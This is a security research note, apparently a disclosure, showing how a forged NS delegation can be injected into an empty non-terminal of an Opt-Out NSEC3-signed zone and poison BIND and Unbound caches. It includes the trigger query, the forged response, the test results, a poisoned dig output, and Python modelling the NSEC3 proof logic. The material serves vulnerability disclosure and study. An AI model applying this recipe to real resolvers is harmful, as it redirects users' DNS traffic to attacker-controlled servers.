Forged Delegation Injection into Empty Non-Terminal with NSEC3

Tsunehiko Suzuki, 2018/01/12

Abstract

NSEC3 is broken ... (especially dnssec-signzone)

1. Target Zone

  ; RFC 5155 Appendix A. Example Zone and optional records for ENT
  example.           IN SOA ns1.example. bugs.x.w.example. 1 3600 300 3600000 3600
  example.           IN NS  ns1.example.
  ns1.example.       IN A   192.168.11.1
  example.           IN MX  1 xx.example.
  ; for making empty non-terminal "gov.example"
  ex.gov.example.    IN NS  ns.ex.gov.example.
  ns.ex.gov.example. IN A   192.168.11.21
signed with opt-out NSEC3 (either tool):
# dnssec-signzone -P -A -H 12 -3 aabbccdd ...
# ldns-signzone -n -p -t 12 -s aabbccdd ...

2. Attack

Trigger Query

<random>.gov.example. IN A

Forged Response

Flag: AA=0
Authority Section: gov.example. IN NS ns.poison.nom. ; (forged delegation)

3. Result

Rows: cache server + query. Columns: content server + sign tool.

  Cache + query            BIND + ldns-signzone   BIND + dnssec-signzone   NSD + ldns-signzone   NSD + dnssec-signzone
  BIND + nxdomain.ENT      NXDOMAIN               NXDOMAIN                 NXDOMAIN              SERVFAIL *1 (NXDOMAIN with +cd)
  BIND + NS_of_ENT         NODATA                 NODATA                   NODATA                NODATA
  BIND + attack            SERVFAIL *2            POISONED                 SERVFAIL *2           SERVFAIL *2
  Unbound + nxdomain.ENT   NXDOMAIN               NXDOMAIN                 NXDOMAIN              SERVFAIL *1 (NXDOMAIN with -o CD)
  Unbound + NS_of_ENT      NODATA                 NODATA                   NODATA                NODATA
  Unbound + attack         N/A                    POISONED                 N/A                   N/A

nxdomain.ENT = `dig -t a foobar.gov.example.`
NS_of_ENT = `dig -t ns gov.example.`

*1 : In spite of the presentation at OARC25, NSD appears to be broken. You can observe the SERVFAIL with 'NSD + ENT + opt-out + dnssec-signzone' by `dig foobar.gov.mufj.jp @8.8.8.8 +nocd +dnssec`. ("gov.mufj.jp" is an ENT; there is an insecure "sub.gov.mufj.jp" zone below it.)

*2 : SERVFAIL is returned to the client, but after the attack the poisoned entry is in the cache and can be seen with `dig +cd`.

POISONED result

# dig a ns.ex.gov.example 

; <<>> DiG 9.11.2 <<>> a ns.ex.gov.example
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 64666
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: ca9abd03a0e3723cb190f4255a51f34843c7d1f72b3ed00d (good)
;; QUESTION SECTION:
;ns.ex.gov.example.        IN  A

;; ANSWER SECTION:
ns.ex.gov.example.   1800  IN  A   127.0.0.1

;; AUTHORITY SECTION:
gov.example.        48362  IN  NS  ns.poison.nom.

;; Query time: 0 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Sun Jan 07 19:15:36 JST 2018
;; MSG SIZE  rcvd: 119

Conclusion

... NSEC3 is broken ... (especially dnssec-signzone)

What is the NSEC3 actually proving?
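As an added illustration (not part of the original note), the code below implements RFC 5155 NSEC3 hashing with the salt and iteration count from section 1, and the referral check a validator performs (RFC 5155 section 8.6) when it sees "gov.example NS" and asks the parent for a DS. The note does not say which signer leaves out the NSEC3 record for the ENT gov.example, so the example takes the presence or absence of that one record as the variable and labels it as an assumption: with it, the empty bitmap (no NS, no DS) denies any delegation; without it, gov.example falls into an Opt-Out span and the validator must accept the forged referral as an insecure delegation.

```python
import base64, hashlib

SALT, ITERATIONS, OPT_OUT = "aabbccdd", 12, 0x01   # salt/iterations from section 1; Opt-Out flag bit

def nsec3_hash(name):
    """RFC 5155 section 5: SHA-1(wire-format owner || salt), re-hashed ITERATIONS more times."""
    labels = [l for l in name.lower().rstrip(".").split(".") if l]
    wire = b"".join(bytes([len(l)]) + l.encode() for l in labels) + b"\x00"
    salt = bytes.fromhex(SALT)
    digest = hashlib.sha1(wire + salt).digest()
    for _ in range(ITERATIONS):
        digest = hashlib.sha1(digest + salt).digest()
    # base32 with the extended-hex alphabet (RFC 4648 section 7): 20 bytes -> 32 chars, no padding
    b32hex = bytes.maketrans(b"ABCDEFGHIJKLMNOPQRSTUVWXYZ234567", b"0123456789ABCDEFGHIJKLMNOPQRSTUV")
    return base64.b32encode(digest).translate(b32hex).decode().lower()

def build_chain(zone):
    """zone: {owner: set of types} -> sorted [(hashed owner, flags, next hashed owner, types)].
    Every record carries Opt-Out, as dnssec-signzone -A and ldns-signzone -p set it on all NSEC3s."""
    rows = sorted((nsec3_hash(owner), types) for owner, types in zone.items())
    return [(h, OPT_OUT, rows[(i + 1) % len(rows)][0], t) for i, (h, t) in enumerate(rows)]

def find(chain, h):
    return next((r for r in chain if r[0] == h), None)

def covers(rec, h):
    owner, _, nxt, _ = rec
    return owner < h < nxt or (owner > nxt and (h > owner or h < nxt))   # last record wraps around

def delegation_proof(chain, name):
    """What the DS lookup made before trusting a referral to `name` can prove from this chain."""
    match = find(chain, nsec3_hash(name))
    if match is not None:                      # NSEC3 matching the name: its bitmap decides
        return "INSECURE-DELEGATION" if "NS" in match[3] else "NO-DELEGATION"
    labels = name.rstrip(".").split(".")
    for i in range(1, len(labels)):            # walk up to the closest encloser that has an NSEC3
        if find(chain, nsec3_hash(".".join(labels[i:]))):
            cover = next(r for r in chain if covers(r, nsec3_hash(".".join(labels[i - 1:]))))
            return "OPT-OUT-SPAN" if cover[1] & OPT_OUT else "NXDOMAIN"
    return "BOGUS"                             # no closest encloser: the proof is incomplete

# Constructed from the zone in section 1: ex.gov.example is an unsigned delegation skipped by
# Opt-Out and ns.ex.gov.example lies below it, so neither gets an NSEC3 record.
SIGNED_NAMES = {"example.": {"SOA", "NS", "MX", "DNSKEY", "NSEC3PARAM", "RRSIG"},
                "ns1.example.": {"A", "RRSIG"}}
# Assumption: the two chains differ only in whether the signer emitted an NSEC3 for the ENT.
CHAIN_WITH_ENT = build_chain({**SIGNED_NAMES, "gov.example.": set()})
CHAIN_WITHOUT_ENT = build_chain(SIGNED_NAMES)
```

`delegation_proof(CHAIN_WITH_ENT, "gov.example.")` yields NO-DELEGATION (the forged referral fails validation), while the same call on `CHAIN_WITHOUT_ENT` yields OPT-OUT-SPAN, the case in which a validator has no way to reject it.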

Environment

  Content server   BIND 9.11.2              NSD 4.1.12
  Cache server     BIND 9.11.2              Unbound 1.5.10
  Sign tool        dnssec-signzone 9.11.2   ldns-signzone 1.6.17

Tsunehiko Suzuki / Chukyo University / tss at e-ontap.com / 2018.1.7